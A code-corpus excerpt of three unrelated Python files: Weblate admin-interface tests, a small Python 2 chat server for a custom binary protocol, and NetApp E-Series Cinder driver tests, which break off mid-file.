# This file is part of Weblate <https://weblate.org/>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
import json
import os
import responses
import social_django.utils
from django.conf import settings
from django.core import mail
from django.core.checks import Critical
from django.core.serializers.json import DjangoJSONEncoder
from django.test.utils import override_settings
from django.urls import reverse
from django.utils import timezone
from weblate.auth.models import Group
from weblate.trans.models import Announcement
from weblate.trans.tests.test_views import ViewTestCase
from weblate.trans.tests.utils import get_test_file
from weblate.utils.checks import check_data_writable
from weblate.utils.unittest import tempdir_setting
from weblate.wladmin.middleware import ManageMiddleware
from weblate.wladmin.models import BackupService, ConfigurationError, SupportStatus
TEST_BACKENDS = ("weblate.accounts.auth.WeblateUserBackend",)
class AdminTest(ViewTestCase):
"""Test for customized admin interface."""
def setUp(self):
super().setUp()
self.user.is_superuser = True
self.user.save()
def test_index(self):
response = self.client.get(reverse("admin:index"))
self.assertContains(response, "SSH")
def test_manage_index(self):
response = self.client.get(reverse("manage"))
self.assertContains(response, "SSH")
def test_ssh(self):
response = self.client.get(reverse("manage-ssh"))
self.assertContains(response, "SSH keys")
@tempdir_setting("DATA_DIR")
def test_ssh_generate(self):
self.assertEqual(check_data_writable(), [])
response = self.client.get(reverse("manage-ssh"))
self.assertContains(response, "Generate SSH key")
response = self.client.post(reverse("manage-ssh"), {"action": "generate"})
self.assertContains(response, "Created new SSH key")
response = self.client.get(reverse("manage-ssh-key"))
self.assertContains(response, "PRIVATE KEY")
@tempdir_setting("DATA_DIR")
def test_ssh_add(self):
self.assertEqual(check_data_writable(), [])
try:
oldpath = os.environ["PATH"]
os.environ["PATH"] = ":".join((get_test_file(""), os.environ["PATH"]))
# Verify there is button for adding
response = self.client.get(reverse("manage-ssh"))
self.assertContains(response, "Add host key")
# Add the key
response = self.client.post(
reverse("manage-ssh"), {"action": "add-host", "host": "github.com"}
)
self.assertContains(response, "Added host key for github.com")
finally:
os.environ["PATH"] = oldpath
# Check the file contains it
hostsfile = os.path.join(settings.DATA_DIR, "ssh", "known_hosts")
with open(hostsfile) as handle:
self.assertIn("github.com", handle.read())
@tempdir_setting("BACKUP_DIR")
def test_backup(self):
def do_post(**payload):
return self.client.post(reverse("manage-backups"), payload, follow=True)
response = do_post(repository=settings.BACKUP_DIR)
self.assertContains(response, settings.BACKUP_DIR)
service = BackupService.objects.get()
response = do_post(service=service.pk, trigger="1")
self.assertContains(response, "triggered")
response = do_post(service=service.pk, toggle="1")
self.assertContains(response, "Turned off")
response = do_post(service=service.pk, remove="1")
self.assertNotContains(response, settings.BACKUP_DIR)
def test_performance(self):
response = self.client.get(reverse("manage-performance"))
self.assertContains(response, "weblate.E005")
def test_error(self):
ConfigurationError.objects.create(name="Test error", message="FOOOOOOOOOOOOOO")
response = self.client.get(reverse("manage-performance"))
self.assertContains(response, "FOOOOOOOOOOOOOO")
ConfigurationError.objects.filter(name="Test error").delete()
response = self.client.get(reverse("manage-performance"))
self.assertNotContains(response, "FOOOOOOOOOOOOOO")
def test_report(self):
response = self.client.get(reverse("manage-repos"))
self.assertContains(response, "On branch main")
def test_create_project(self):
response = self.client.get(reverse("admin:trans_project_add"))
self.assertContains(response, "Required fields are marked in bold")
def test_create_component(self):
response = self.client.get(reverse("admin:trans_component_add"))
self.assertContains(response, "Import speed documentation")
def test_component(self):
"""Test for custom component actions."""
self.assert_custom_admin(reverse("admin:trans_component_changelist"))
def test_project(self):
"""Test for custom project actions."""
self.assert_custom_admin(reverse("admin:trans_project_changelist"))
def assert_custom_admin(self, url):
"""Test for (sub)project custom admin."""
response = self.client.get(url)
self.assertContains(response, "Update VCS repository")
for action in "force_commit", "update_checks", "update_from_git":
response = self.client.post(
url, {"_selected_action": "1", "action": action}
)
self.assertRedirects(response, url)
def test_configuration_health_check(self):
# Run checks internally
ManageMiddleware.configuration_health_check()
# List of triggered checks remotely
ManageMiddleware.configuration_health_check(
[
Critical(msg="Error", id="weblate.E001"),
Critical(msg="Test Error", id="weblate.E002"),
]
)
all_errors = ConfigurationError.objects.all()
self.assertEqual(len(all_errors), 1)
self.assertEqual(all_errors[0].name, "weblate.E002")
self.assertEqual(all_errors[0].message, "Test Error")
# No triggered checks
ManageMiddleware.configuration_health_check([])
self.assertEqual(ConfigurationError.objects.count(), 0)
def test_post_announcement(self):
response = self.client.get(reverse("manage-tools"))
self.assertContains(response, "announcement")
self.assertFalse(Announcement.objects.exists())
response = self.client.post(
reverse("manage-tools"),
{"message": "Test message", "category": "info"},
follow=True,
)
self.assertTrue(Announcement.objects.exists())
def test_send_test_email(self, expected="Test e-mail sent"):
response = self.client.get(reverse("manage-tools"))
self.assertContains(response, "e-mail")
response = self.client.post(
reverse("manage-tools"), {"email": "[email protected]"}, follow=True
)
self.assertContains(response, expected)
if expected == "Test e-mail sent":
self.assertEqual(len(mail.outbox), 1)
def test_invite_user(self):
response = self.client.get(reverse("manage-users"))
self.assertContains(response, "E-mail")
response = self.client.post(
reverse("manage-users"),
{
"email": "[email protected]",
"username": "username",
"full_name": "name",
"send_email": 1,
},
follow=True,
)
self.assertContains(response, "Created user account")
self.assertEqual(len(mail.outbox), 1)
def test_invite_user_nosend(self):
response = self.client.get(reverse("manage-users"))
self.assertContains(response, "E-mail")
response = self.client.post(
reverse("manage-users"),
{
"email": "[email protected]",
"username": "username",
"full_name": "name",
},
follow=True,
)
self.assertContains(response, "Created user account")
self.assertEqual(len(mail.outbox), 0)
@override_settings(AUTHENTICATION_BACKENDS=TEST_BACKENDS)
def test_invite_user_nomail(self):
try:
# psa creates copy of settings...
orig_backends = social_django.utils.BACKENDS
social_django.utils.BACKENDS = TEST_BACKENDS
response = self.client.get(reverse("manage-users"))
self.assertContains(response, "E-mail")
response = self.client.post(
reverse("manage-users"),
{
"email": "[email protected]",
"username": "username",
"full_name": "name",
"send_email": 1,
},
follow=True,
)
self.assertContains(response, "Created user account")
self.assertEqual(len(mail.outbox), 1)
finally:
social_django.utils.BACKENDS = orig_backends
def test_check_user(self):
response = self.client.get(
reverse("manage-users-check"), {"email": self.user.email}, follow=True
)
self.assertRedirects(response, self.user.get_absolute_url())
self.assertContains(response, "Never signed-in")
response = self.client.get(
reverse("manage-users-check"), {"email": "nonexisting"}, follow=True
)
self.assertRedirects(response, reverse("manage-users") + "?q=nonexisting")
@override_settings(
EMAIL_HOST="nonexisting.weblate.org",
EMAIL_BACKEND="django.core.mail.backends.smtp.EmailBackend",
)
def test_send_test_email_error(self):
self.test_send_test_email("Could not send test e-mail")
@responses.activate
def test_activation_community(self):
responses.add(
responses.POST,
settings.SUPPORT_API_URL,
body=json.dumps(
{
"name": "community",
"backup_repository": "",
"expiry": timezone.now(),
"in_limits": True,
},
cls=DjangoJSONEncoder,
),
)
self.client.post(reverse("manage-activate"), {"secret": "123456"})
status = SupportStatus.objects.get()
self.assertEqual(status.name, "community")
self.assertFalse(BackupService.objects.exists())
self.assertFalse(status.discoverable)
self.client.post(reverse("manage-discovery"))
status = SupportStatus.objects.get()
self.assertTrue(status.discoverable)
@responses.activate
def test_activation_hosted(self):
responses.add(
responses.POST,
settings.SUPPORT_API_URL,
body=json.dumps(
{
"name": "hosted",
"backup_repository": "/tmp/xxx",
"expiry": timezone.now(),
"in_limits": True,
},
cls=DjangoJSONEncoder,
),
)
self.client.post(reverse("manage-activate"), {"secret": "123456"})
status = SupportStatus.objects.get()
self.assertEqual(status.name, "hosted")
backup = BackupService.objects.get()
self.assertEqual(backup.repository, "/tmp/xxx")
self.assertFalse(backup.enabled)
self.assertFalse(status.discoverable)
self.client.post(reverse("manage-discovery"))
status = SupportStatus.objects.get()
self.assertTrue(status.discoverable)
def test_group_management(self):
# Add form
response = self.client.get(reverse("admin:weblate_auth_group_add"))
self.assertContains(response, "Automatic group assignment")
# Create group
name = "Test group"
response = self.client.post(
reverse("admin:weblate_auth_group_add"),
{
"name": name,
"language_selection": "1",
"project_selection": "1",
"autogroup_set-TOTAL_FORMS": "0",
"autogroup_set-INITIAL_FORMS": "0",
},
follow=True,
)
self.assertContains(response, name)
# Edit form
group = Group.objects.get(name=name)
url = reverse("admin:weblate_auth_group_change", kwargs={"object_id": group.pk})
response = self.client.get(url)
self.assertContains(response, "Automatic group assignment")
self.assertContains(response, name)
| phw/weblate | weblate/wladmin/tests.py | Python | gpl-3.0 | 13,318 |
#!/usr/bin/env python
import socket
import struct
import stkuser
from stkutil import running, socklist, updateinfo
STK_SERVER_PORT = 9007
STK_MAX_CLIENTS = 30
STK_MAX_PACKET_SIZE = 65535
STK_MAGIC = 'ST'
STK_VERSION = 0x0001
STK_CLIENT_FLAG = 0x00
STK_SERVER_FLAG = 0x01
STK_END = 0x07
COMMANDS = {
'REQ_LOGIN' : 0x01,
'LOGIN' : 0x02,
'KEEPALIVE' : 0x03,
'LOGOUT' : 0x04,
'GET_USER' : 0x05,
'GET_ONLINE_USER' : 0x06,
'GET_USER_INFO' : 0x07,
'GET_GROUP' : 0x08,
'GET_GROUP_INFO' : 0x09,
'SEND_MSG' : 0x0A,
'REPLY_MSG' : 0x0B,
'SEND_GMSG' : 0x0C,
'REPLY_GMSG' : 0x0D,
'END' : 0xFF
}
# user and group information
user = stkuser.StkUsers()
group = stkuser.StkGroups()
class StkPacket:
def __init__(self, buf):
# Build the field dict per instance; a class-level dict would be shared
# across packets (and across client threads) and could be overwritten
# while another thread is still reading it.
self.sp = { 'magic':'', 'version':0, 'cmd':0, 'sid':0, 'uid':0,
'token':0, 'reserve':0, 'flag':0, 'length':0, 'data':'', 'end':0 }
head = buf[:20]
self.sp['data'] = buf[20:-1]
self.sp['end'], = struct.unpack('!B', buf[-1])
self.sp['magic'], \
self.sp['version'], \
self.sp['cmd'], \
self.sp['sid'], \
self.sp['uid'], \
self.sp['token'], \
self.sp['reserve'], \
self.sp['flag'], \
self.sp['length'] = struct.unpack('!2sHHHIIBBH', head)
def check_head_valid(self):
if (self.sp['magic'] != STK_MAGIC \
or self.sp['version'] != STK_VERSION \
or self.sp['flag'] != STK_CLIENT_FLAG \
or self.sp['end'] != STK_END):
return False
else:
return True
def get_stk_uid(self):
return self.sp['uid']
def get_stk_cmd(self):
return self.sp['cmd']
def get_stk_sid(self):
return self.sp['sid']
def get_stk_len(self):
return self.sp['length']
def get_stk_data(self):
return self.sp['data']
def show_stk_head(self):
print 'Magic: %s' % self.sp['magic']
print 'Version: 0x%04x' % self.sp['version']
print 'Command: 0x%04x' % self.sp['cmd']
print 'SessionID: %u' % self.sp['sid']
print 'STKID: %u' % self.sp['uid']
print 'Token: %u' % self.sp['token']
print 'Reserved: %u' % self.sp['reserve']
if self.sp['flag'] == 0:
print 'Client Packet'
else:
print 'Server Packet'
print 'Length: %u' % self.sp['length']
print 'End: 0x%02u' % self.sp['end']
print ''
class StkClient:
sock = None
uid = 0
sid = 0
state = 0
token = 0
reverse = 0
def __init__(self, sock):
self.sock = sock
def stk_set_client(self, uid, sid):
global socklist
self.uid = uid
self.sid = sid
socklist[str(uid)] = self.sock
def stk_get_sock(self):
return self.sock
def stk_reqlog_ack(self, data):
buf = struct.pack('!2sHHHIIBBHB', STK_MAGIC, STK_VERSION, COMMANDS['REQ_LOGIN'], self.sid,
self.uid, self.token, self.reverse, STK_SERVER_FLAG, 0, STK_END)
self.sock.send(buf)
def stk_login_ack(self, data):
global updatedata, socklist, updateinfo
passwd = user.stk_get_pass(self.uid)
result = 0
passtmp, reversetmp = struct.unpack('!32s64s', data)
passnew = passtmp.strip('\000')
if passwd == 'STK_UNKNOWN_USER':
result = 2
elif self.state == 1:
result = 1
elif passwd == passnew:
print 'STK Client %s(%u) is Login in.' % (user.stk_get_nickname(self.uid), self.uid)
self.state = 1
socklist[self.uid] = [self.sock, self.state]
# Notify ui to update
updateinfo.append([self.uid, u'online'])
result = 0
else:
result = 3
buf = struct.pack('!2sHHHIIBBHBB', STK_MAGIC, STK_VERSION, COMMANDS['LOGIN'], self.sid,
self.uid, self.token, self.reverse, STK_SERVER_FLAG, 1, result, STK_END)
self.sock.send(buf)
def stk_keepalive_ack(self, data):
pass
def stk_getuser_ack(self, data):
global user
uids = user.stk_get_uids()
length = 4 * (len(uids) - 1) + 2
buf = struct.pack('!2sHHHIIBBHH', STK_MAGIC, STK_VERSION, COMMANDS['GET_USER'], self.sid,
self.uid, self.token, self.reverse, STK_SERVER_FLAG, length, len(uids)-1)
for k in uids:
if k == self.uid:
pass
else:
buf += struct.pack('!I', k)
buf += struct.pack('!B', STK_END)
self.sock.send(buf)
def stk_getonlineuser_ack(self, data):
pass
def stk_getuserinfo_ack(self, data):
global user
uid, nickname, city, phone, gender = struct.unpack('!I32s16sIB', data)
uinfo = user.stk_get_userinfo(uid)
length = 4 + 32 + 16 + 4 + 1
buf = struct.pack('!2sHHHIIBBHI32s16sIBB', STK_MAGIC, STK_VERSION, COMMANDS['GET_USER_INFO'], self.sid,
self.uid, self.token, self.reverse, STK_SERVER_FLAG, length, uinfo['uid'],
uinfo['nickname'].encode(), uinfo['city'].encode(), uinfo['phone'], uinfo['gender'], STK_END)
self.sock.send(buf)
def stk_getgroup_ack(self, data):
global group
gids = group.stk_get_gids()
length = 4 * len(gids) + 2
buf = struct.pack('!2sHHHIIBBHH', STK_MAGIC, STK_VERSION, COMMANDS['GET_GROUP'], self.sid,
self.uid, self.token, self.reverse, STK_SERVER_FLAG, length, len(gids))
for k in gids:
buf += struct.pack('!I', k)
buf += struct.pack('!B', STK_END)
self.sock.send(buf)
def stk_getgroupinfo_ack(self, data):
global group
gid, gname, membernum = struct.unpack('!I32sH', data)
ginfo = group.stk_get_groupinfo(gid)
members = ginfo['members'].split('-')
length = 4 + 32 + 2 + 4 * len(members)
buf = struct.pack('!2sHHHIIBBHI32sH', STK_MAGIC, STK_VERSION, COMMANDS['GET_GROUP_INFO'], self.sid,
self.uid, self.token, self.reverse, STK_SERVER_FLAG, length, ginfo['gid'],
ginfo['gname'].encode(), len(members))
for k in members:
buf += struct.pack('!I', int(k))
buf += struct.pack('!B', STK_END)
self.sock.send(buf)
def stk_sendmsg_ack(self, data):
global user, socklist
tmp = data[:4]
msg = data[4:]
uid, = struct.unpack('!I', tmp)
length = 4 + len(msg)
buf = struct.pack('!2sHHHIIBBHI', STK_MAGIC, STK_VERSION, COMMANDS['SEND_MSG'], self.sid,
self.uid, self.token, self.reverse, STK_SERVER_FLAG, length, uid)
buf += msg + struct.pack('!B', STK_END)
psock = socklist[uid][0]
if (psock != -1):
psock.send(buf)
else:
print 'Msg From %s(%u) to %s(%u), \n --- but %s is not online.' \
%(user.stk_get_nickname(self.uid), self.uid, \
user.stk_get_nickname(uid), uid, user.stk_get_nickname(uid))
def stk_sendgmsg_ack(self, data):
global group, socklist
tmp = data[:4]
msg = data[4:]
gid, = struct.unpack('!I', tmp)
length = 4 + len(msg)
buf = struct.pack('!2sHHHIIBBHI', STK_MAGIC, STK_VERSION, COMMANDS['SEND_GMSG'], self.sid,
self.uid, self.token, self.reverse, STK_SERVER_FLAG, length, gid)
buf += msg + struct.pack('!B', STK_END)
ginfo = group.stk_get_groupinfo(gid)
members = ginfo['members'].split('-')
for k in members:
if self.uid == int(k):
continue
psock = socklist[int(k)][0]
if (psock != -1):
psock.send(buf)
else:
print 'Msg for %s(%u) by %s(%u), \n --- but %s(%u) is not online.' \
% (group.stk_get_groupname(gid), gid, \
user.stk_get_nickname(self.uid), self.uid, \
user.stk_get_nickname(int(k)), int(k))
def stk_socket_thread(t):
c = t[0]
client = StkClient(c)
while 1:
try:
buf = c.recv(STK_MAX_PACKET_SIZE)
# socket.timeout or socket.error or ...
except socket.timeout:
global running
if running == False:
break;
except socket.error:
# Whatever, error happen, just exit
break;
else:
size = len(buf)
if size == -1:
print 'Recv Socket Error.'
break;
elif size == 0:
print 'Peer Socket Shutdown.'
break;
elif size > STK_MAX_PACKET_SIZE:
print 'Drop Packet(Too Large).'
break;
else:
pass
h = StkPacket(buf)
#h.show_stk_head()
if (h.check_head_valid() != True):
print 'Bad STK Packet.'
continue
cmd = h.get_stk_cmd()
uid = h.get_stk_uid()
sid = h.get_stk_sid()
data = h.get_stk_data()
length = h.get_stk_len()
del h
if cmd == COMMANDS['REQ_LOGIN']:
client.stk_set_client(uid, sid)
client.stk_reqlog_ack(data)
elif cmd == COMMANDS['LOGIN']:
client.stk_login_ack(data)
elif cmd == COMMANDS['KEEPALIVE']:
client.stk_keepalive_ack(data)
elif cmd == COMMANDS['LOGOUT']:
pass
elif cmd == COMMANDS['GET_USER']:
client.stk_getuser_ack(data)
elif cmd == COMMANDS['GET_ONLINE_USER']:
client.stk_getonlineuser_ack(data)
elif cmd == COMMANDS['GET_USER_INFO']:
client.stk_getuserinfo_ack(data)
elif cmd == COMMANDS['GET_GROUP']:
client.stk_getgroup_ack(data)
elif cmd == COMMANDS['GET_GROUP_INFO']:
client.stk_getgroupinfo_ack(data)
elif cmd == COMMANDS['SEND_MSG']:
client.stk_sendmsg_ack(data)
elif cmd == COMMANDS['REPLY_MSG']:
pass
elif cmd == COMMANDS['SEND_GMSG']:
client.stk_sendgmsg_ack(data)
elif cmd == COMMANDS['REPLY_GMSG']:
pass
else:
print 'Unknow Command, Drop.'
pass
c.close
# Notify ui to update
global socklist, updateinfo
socklist[uid] = [None, 0]
updateinfo.append([uid, u'offline'])
print 'Client socket thread exiting...'
| sharmer/sixtalk | stkserver/python/stksocket.py | Python | gpl-2.0 | 8,920 |
# Copyright (c) 2014 Andrew Kerr
# Copyright (c) 2015 Alex Meade
# Copyright (c) 2015 Rushil Chugh
# Copyright (c) 2015 Yogesh Kshirsagar
# Copyright (c) 2015 Michael Price
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import ddt
import mock
from oslo_utils import units
import six
from cinder import exception
from cinder import test
from cinder.tests.unit import fake_snapshot
from cinder.tests.unit.volume.drivers.netapp.eseries import fakes as \
eseries_fake
from cinder.volume.drivers.netapp.eseries import client as es_client
from cinder.volume.drivers.netapp.eseries import exception as eseries_exc
from cinder.volume.drivers.netapp.eseries import host_mapper
from cinder.volume.drivers.netapp.eseries import library
from cinder.volume.drivers.netapp.eseries import utils
from cinder.volume.drivers.netapp import utils as na_utils
from cinder.zonemanager import utils as fczm_utils
def get_fake_volume():
return {
'id': '114774fb-e15a-4fae-8ee2-c9723e3645ef', 'size': 1,
'volume_name': 'lun1', 'host': 'hostname@backend#DDP',
'os_type': 'linux', 'provider_location': 'lun1',
'name_id': '114774fb-e15a-4fae-8ee2-c9723e3645ef',
'provider_auth': 'provider a b', 'project_id': 'project',
'display_name': None, 'display_description': 'lun1',
'volume_type_id': None, 'migration_status': None, 'attach_status':
"detached"
}
@ddt.ddt
class NetAppEseriesLibraryTestCase(test.TestCase):
def setUp(self):
super(NetAppEseriesLibraryTestCase, self).setUp()
kwargs = {'configuration':
eseries_fake.create_configuration_eseries()}
self.library = library.NetAppESeriesLibrary('FAKE', **kwargs)
# Deprecated Option
self.library.configuration.netapp_storage_pools = None
self.library._client = eseries_fake.FakeEseriesClient()
self.library.check_for_setup_error()
def test_do_setup(self):
self.mock_object(self.library,
'_check_mode_get_or_register_storage_system')
self.mock_object(es_client, 'RestClient',
eseries_fake.FakeEseriesClient)
mock_check_flags = self.mock_object(na_utils, 'check_flags')
self.library.do_setup(mock.Mock())
self.assertTrue(mock_check_flags.called)
def test_get_storage_pools_empty_result(self):
"""Verify an exception is raised if no pools are returned."""
self.library.configuration.netapp_pool_name_search_pattern = '$'
self.assertRaises(exception.NetAppDriverException,
self.library.check_for_setup_error)
def test_get_storage_pools_invalid_conf(self):
"""Verify an exception is raised if the regex pattern is invalid."""
self.library.configuration.netapp_pool_name_search_pattern = '(.*'
self.assertRaises(exception.InvalidConfigurationValue,
self.library._get_storage_pools)
def test_get_storage_pools_default(self):
"""Verify that all pools are returned if the search option is empty."""
filtered_pools = self.library._get_storage_pools()
self.assertEqual(eseries_fake.STORAGE_POOLS, filtered_pools)
@ddt.data(('[\d]+,a', ['1', '2', 'a', 'b'], ['1', '2', 'a']),
('1 , 3', ['1', '2', '3'], ['1', '3']),
('$,3', ['1', '2', '3'], ['3']),
('[a-zA-Z]+', ['1', 'a', 'B'], ['a', 'B']),
('', ['1', '2'], ['1', '2'])
)
@ddt.unpack
def test_get_storage_pools(self, pool_filter, pool_labels,
expected_pool_labels):
"""Verify that pool filtering via the search_pattern works correctly
:param pool_filter: A regular expression to be used for filtering via
pool labels
:param pool_labels: A list of pool labels
:param expected_pool_labels: The labels from 'pool_labels' that
should be matched by 'pool_filter'
"""
self.library.configuration.netapp_pool_name_search_pattern = (
pool_filter)
pools = [{'label': label} for label in pool_labels]
self.library._client.list_storage_pools = mock.Mock(
return_value=pools)
filtered_pools = self.library._get_storage_pools()
filtered_pool_labels = [pool['label'] for pool in filtered_pools]
self.assertEqual(expected_pool_labels, filtered_pool_labels)
def test_get_volume(self):
fake_volume = copy.deepcopy(get_fake_volume())
volume = copy.deepcopy(eseries_fake.VOLUME)
self.library._client.list_volume = mock.Mock(return_value=volume)
result = self.library._get_volume(fake_volume['id'])
self.assertEqual(1, self.library._client.list_volume.call_count)
self.assertDictMatch(volume, result)
def test_get_volume_bad_input(self):
volume = copy.deepcopy(eseries_fake.VOLUME)
self.library._client.list_volume = mock.Mock(return_value=volume)
self.assertRaises(exception.InvalidInput, self.library._get_volume,
None)
def test_get_volume_bad_uuid(self):
volume = copy.deepcopy(eseries_fake.VOLUME)
self.library._client.list_volume = mock.Mock(return_value=volume)
self.assertRaises(ValueError, self.library._get_volume, '1')
def test_update_ssc_info_no_ssc(self):
drives = [{'currentVolumeGroupRef': 'test_vg1',
'driveMediaType': 'ssd'}]
pools = [{'volumeGroupRef': 'test_vg1', 'label': 'test_vg1',
'raidLevel': 'raid6', 'securityType': 'enabled'}]
self.library._client = mock.Mock()
self.library._client.features.SSC_API_V2 = na_utils.FeatureState(
False, minimum_version="1.53.9000.1")
self.library._client.SSC_VALID_VERSIONS = [(1, 53, 9000, 1),
(1, 53, 9010, 15)]
self.library.configuration.netapp_pool_name_search_pattern = "test_vg1"
self.library._client.list_storage_pools = mock.Mock(return_value=pools)
self.library._client.list_drives = mock.Mock(return_value=drives)
self.library._update_ssc_info()
self.assertEqual(
{'test_vg1': {'netapp_disk_encryption': 'true',
'netapp_disk_type': 'SSD',
'netapp_raid_type': 'raid6'}},
self.library._ssc_stats)
@ddt.data(True, False)
def test_update_ssc_info(self, data_assurance_supported):
self.library._client = mock.Mock()
self.library._client.features.SSC_API_V2 = na_utils.FeatureState(
True, minimum_version="1.53.9000.1")
self.library._client.list_ssc_storage_pools = mock.Mock(
return_value=eseries_fake.SSC_POOLS)
self.library._get_storage_pools = mock.Mock(
return_value=eseries_fake.STORAGE_POOLS)
# Data Assurance is not supported on some storage backends
self.library._is_data_assurance_supported = mock.Mock(
return_value=data_assurance_supported)
self.library._update_ssc_info()
for pool in eseries_fake.SSC_POOLS:
poolId = pool['poolId']
raid_lvl = self.library.SSC_RAID_TYPE_MAPPING.get(
pool['raidLevel'], 'unknown')
if pool['pool']["driveMediaType"] == 'ssd':
disk_type = 'SSD'
else:
disk_type = pool['pool']['drivePhysicalType']
disk_type = (
self.library.SSC_DISK_TYPE_MAPPING.get(
disk_type, 'unknown'))
da_enabled = pool['dataAssuranceCapable'] and (
data_assurance_supported)
thin_provisioned = pool['thinProvisioningCapable']
expected = {
'netapp_disk_encryption':
six.text_type(pool['encrypted']).lower(),
'netapp_eseries_flash_read_cache':
six.text_type(pool['flashCacheCapable']).lower(),
'netapp_thin_provisioned':
six.text_type(thin_provisioned).lower(),
'netapp_eseries_data_assurance':
six.text_type(da_enabled).lower(),
'netapp_eseries_disk_spindle_speed': pool['spindleSpeed'],
'netapp_raid_type': raid_lvl,
'netapp_disk_type': disk_type
}
actual = self.library._ssc_stats[poolId]
self.assertDictMatch(expected, actual)
@ddt.data(('FC', True), ('iSCSI', False))
@ddt.unpack
def test_is_data_assurance_supported(self, backend_storage_protocol,
enabled):
self.mock_object(self.library, 'driver_protocol',
backend_storage_protocol)
actual = self.library._is_data_assurance_supported()
self.assertEqual(enabled, actual)
@ddt.data('scsi', 'fibre', 'sas', 'sata', 'garbage')
def test_update_ssc_disk_types(self, disk_type):
drives = [{'currentVolumeGroupRef': 'test_vg1',
'interfaceType': {'driveType': disk_type}}]
pools = [{'volumeGroupRef': 'test_vg1'}]
self.library._client.list_drives = mock.Mock(return_value=drives)
self.library._client.get_storage_pool = mock.Mock(return_value=pools)
ssc_stats = self.library._update_ssc_disk_types(pools)
expected = self.library.SSC_DISK_TYPE_MAPPING.get(disk_type, 'unknown')
self.assertEqual({'test_vg1': {'netapp_disk_type': expected}},
ssc_stats)
@ddt.data('scsi', 'fibre', 'sas', 'sata', 'garbage')
def test_update_ssc_disk_types_ssd(self, disk_type):
drives = [{'currentVolumeGroupRef': 'test_vg1',
'driveMediaType': 'ssd', 'driveType': disk_type}]
pools = [{'volumeGroupRef': 'test_vg1'}]
self.library._client.list_drives = mock.Mock(return_value=drives)
self.library._client.get_storage_pool = mock.Mock(return_value=pools)
ssc_stats = self.library._update_ssc_disk_types(pools)
self.assertEqual({'test_vg1': {'netapp_disk_type': 'SSD'}},
ssc_stats)
@ddt.data('enabled', 'none', 'capable', 'unknown', '__UNDEFINED',
'garbage')
def test_update_ssc_disk_encryption(self, securityType):
pools = [{'volumeGroupRef': 'test_vg1', 'securityType': securityType}]
self.library._client.list_storage_pools = mock.Mock(return_value=pools)
ssc_stats = self.library._update_ssc_disk_encryption(pools)
# Convert the boolean value to a lower-case string value
expected = 'true' if securityType == "enabled" else 'false'
self.assertEqual({'test_vg1': {'netapp_disk_encryption': expected}},
ssc_stats)
def test_update_ssc_disk_encryption_multiple(self):
pools = [{'volumeGroupRef': 'test_vg1', 'securityType': 'none'},
{'volumeGroupRef': 'test_vg2', 'securityType': 'enabled'}]
self.library._client.list_storage_pools = mock.Mock(return_value=pools)
ssc_stats = self.library._update_ssc_disk_encryption(pools)
self.assertEqual({'test_vg1': {'netapp_disk_encryption': 'false'},
'test_vg2': {'netapp_disk_encryption': 'true'}},
ssc_stats)
@ddt.data(True, False)
def test_get_volume_stats(self, refresh):
fake_stats = {'key': 'val'}
def populate_stats():
self.library._stats = fake_stats
self.library._update_volume_stats = mock.Mock(
side_effect=populate_stats)
self.library._update_ssc_info = mock.Mock()
self.library._ssc_stats = {self.library.THIN_UQ_SPEC: True}
actual = self.library.get_volume_stats(refresh=refresh)
if refresh:
self.library._update_volume_stats.assert_called_once_with()
self.assertEqual(fake_stats, actual)
else:
self.assertEqual(0, self.library._update_volume_stats.call_count)
self.assertEqual(0, self.library._update_ssc_info.call_count)
def test_get_volume_stats_no_ssc(self):
"""Validate that SSC data is collected if not yet populated"""
fake_stats = {'key': 'val'}
def populate_stats():
self.library._stats = fake_stats
self.library._update_volume_stats = mock.Mock(
side_effect=populate_stats)
self.library._update_ssc_info = mock.Mock()
self.library._ssc_stats = None
actual = self.library.get_volume_stats(refresh=True)
self.library._update_volume_stats.assert_called_once_with()
self.library._update_ssc_info.assert_called_once_with()
self.assertEqual(fake_stats, actual)
def test_update_volume_stats_provisioning(self):
"""Validate pool capacity calculations"""
fake_pool = copy.deepcopy(eseries_fake.STORAGE_POOL)
self.library._get_storage_pools = mock.Mock(return_value=[fake_pool])
self.mock_object(self.library, '_ssc_stats', new_attr={fake_pool[
"volumeGroupRef"]: {self.library.THIN_UQ_SPEC: True}})
self.library.configuration = mock.Mock()
reserved_pct = 5
over_subscription_ratio = 1.0
self.library.configuration.max_over_subscription_ratio = (
over_subscription_ratio)
self.library.configuration.reserved_percentage = reserved_pct
total_gb = int(fake_pool['totalRaidedSpace']) / units.Gi
used_gb = int(fake_pool['usedSpace']) / units.Gi
free_gb = total_gb - used_gb
self.library._update_volume_stats()
self.assertEqual(1, len(self.library._stats['pools']))
pool_stats = self.library._stats['pools'][0]
self.assertEqual(fake_pool['label'], pool_stats.get('pool_name'))
self.assertEqual(reserved_pct, pool_stats['reserved_percentage'])
self.assertEqual(over_subscription_ratio,
pool_stats['max_oversubscription_ratio'])
self.assertEqual(total_gb, pool_stats.get('total_capacity_gb'))
self.assertEqual(used_gb, pool_stats.get('provisioned_capacity_gb'))
self.assertEqual(free_gb, pool_stats.get('free_capacity_gb'))
@ddt.data(False, True)
def test_update_volume_stats_thin_provisioning(self, thin_provisioning):
"""Validate that thin provisioning support is correctly reported"""
fake_pool = copy.deepcopy(eseries_fake.STORAGE_POOL)
self.library._get_storage_pools = mock.Mock(return_value=[fake_pool])
self.mock_object(self.library, '_ssc_stats', new_attr={fake_pool[
"volumeGroupRef"]: {self.library.THIN_UQ_SPEC: thin_provisioning}})
self.library._update_volume_stats()
self.assertEqual(1, len(self.library._stats['pools']))
pool_stats = self.library._stats['pools'][0]
self.assertEqual(thin_provisioning, pool_stats.get(
'thin_provisioning_support'))
# Should always be True
self.assertTrue(pool_stats.get('thick_provisioning_support'))
def test_update_volume_stats_ssc(self):
